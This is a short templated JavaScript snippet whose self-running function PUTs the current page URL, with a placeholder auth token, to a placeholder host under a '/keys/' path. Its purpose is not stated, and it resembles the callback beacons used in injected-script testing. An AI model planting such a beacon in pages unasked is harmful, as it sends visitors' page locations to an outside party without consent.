(function() {
var xhr = new XMLHttpRequest();
var params="token={{AUTH_TOKEN}}";
xhr.open("PUT", "{{REPLACE_HOST}}/keys/"+encodeURIComponent(window.location), true);
xhr.onreadystatechange = function() {
    if(this.readyState == 4) {
        console.log("Done.");
    }
}
xhr.send(params);
})();
